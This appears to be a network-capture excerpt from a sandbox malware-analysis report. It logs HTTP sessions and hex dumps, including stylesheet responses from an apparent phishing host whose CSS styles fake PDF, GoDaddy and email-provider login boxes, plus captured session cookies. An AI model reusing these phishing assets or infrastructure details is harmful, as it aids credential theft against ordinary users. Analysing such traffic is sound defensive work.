                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 59 4d 55 53 59 47 63 46 67 54 49 52 42 4b 45 56 45 6d 41 54 6c 4b 55 44 41 51 53 67 30 45 49 41 6f 31 46 33 31 49 56 52 6c 43 55 58 4a 4a 63 42 6c 51 59 6c 55 5a 58 6c 34 32 41 43 59 48 66 55 68 56 47 55 4a 52 63 6b 6c 77 47 56 42 69 56 52 6c 65 46 54 73 66 63 46 6f 63 49 77 5a 4b 58 31 4d 72 42 69 56 64 48 79 77 42 55 51 4d 48 4e 77 67 7a 57 68 55 78 42 6c 73 4e 42 53 59 47 50 52 74 4f 54 33 38 5a 51 6c 46 79 53 58 41 5a 55 47 4a 56 47 55 4a 4e 4e 67 41 6d 47 52 4d 75 46 45 6f 52 54 48 41 51 50 30 77 55 4c 52 74 4e 43 68 41 6b 44 44 46 61 45 79 63 47 53 67 41 65 4a 68 30 2f 56 42 38 79 41 56 41 4e 48 33 49 50 50 30 73 64 62 78 4a 4c 44 51 51 69 53 32 34 30 65 6d 4a 56 47 55 4a 52 63 6b 6c 77 47 56 42 69 56 51 55 44 55 54 59 49 4a 46 68 64 4b 78 45 45 51
                                                                                                                                      Data Ascii: YMUSYGcFgTIRBKEVEmATlKUDAQSg0EIAo1F31IVRlCUXJJcBlQYlUZXl42ACYHfUhVGUJRcklwGVBiVRleFTsfcFocIwZKX1MrBiVdHywBUQMHNwgzWhUxBlsNBSYGPRtOT38ZQlFySXAZUGJVGUJNNgAmGRMuFEoRTHAQP0wULRtNChAkDDFaEycGSgAeJh0/VB8yAVANH3IPP0sdbxJLDQQiS240emJVGUJRcklwGVBiVQUDUTYIJFhdKxEEQ


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      32192.168.2.164975220.114.59.183443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:46 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tr4Mf1t3WFAGUHw&MD=GGGn5gAy HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-05-08 18:12:47 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                      MS-CorrelationId: 09efd5c1-4dd8-4e54-9224-a7099f477c64
                                                                                                                                      MS-RequestId: 41fa2053-4d79-427a-9830-e533cc96f851
                                                                                                                                      MS-CV: Mb39CKtY/0i8CF41.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2160
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Wed, 08 May 2024 18:12:46 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 25457
                                                                                                                                      2024-05-08 18:12:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                      2024-05-08 18:12:47 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      33192.168.2.1649755104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1478OUTGET /56AdOYKMMLgoJxyRlCwu18915 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:48 UTC645INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Content-Type: text/css;charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="56AdOYKMMLgoJxyRlCwu18915"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZIRUlI%2F%2Bt04L31o1%2FZOU1PsVBA3BC3H%2BAKLc9qoY0dmsS%2FbMALG4VpLcKIuobeDiH%2BuuSZ%2FaXsKjw0OVN0y9nKtPJUQLyW5S6CUWk5RWST21QCNeaE8U8HeFvMTeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a4d5feb5b-SEA
                                                                                                                                      2024-05-08 18:12:48 UTC724INData Raw: 33 37 62 31 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                                                                                                      Data Ascii: 37b1*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73
                                                                                                                                      Data Ascii: PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 61 64 69 75 73 3a 32 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29
                                                                                                                                      Data Ascii: adius:20%;background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2)
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64
                                                                                                                                      Data Ascii: ckground:rgba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-d
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f
                                                                                                                                      Data Ascii: align-items:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sectio
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35
                                                                                                                                      Data Ascii: ns_pdf .login .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 6f 75 74 66 6f 72 6d 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d
                                                                                                                                      Data Ascii: outform{from{opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74
                                                                                                                                      Data Ascii: s .loading-container.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 30 20 30 20 31 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64
                                                                                                                                      Data Ascii: 0 0 1px;height:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalld
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62
                                                                                                                                      Data Ascii: -bottom-left-radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-addon{b


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      34192.168.2.1649757104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1468OUTGET /xynV5WTpq6pef30 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:48 UTC635INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Content-Type: text/css;charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="xynV5WTpq6pef30"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2F4LwujxNzzfjgAQemKr3PBjYlVfMcTCOQ3wBl5DP6KHWzVVFs7Mme%2FoCWiI4NUbr7X%2BYduSCfeYmWKxxE2ppKlrBzw5oVBmL2b2l%2BHy04EqRlagA2EH%2F%2Bd9%2BWdODA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a482530c5-SEA
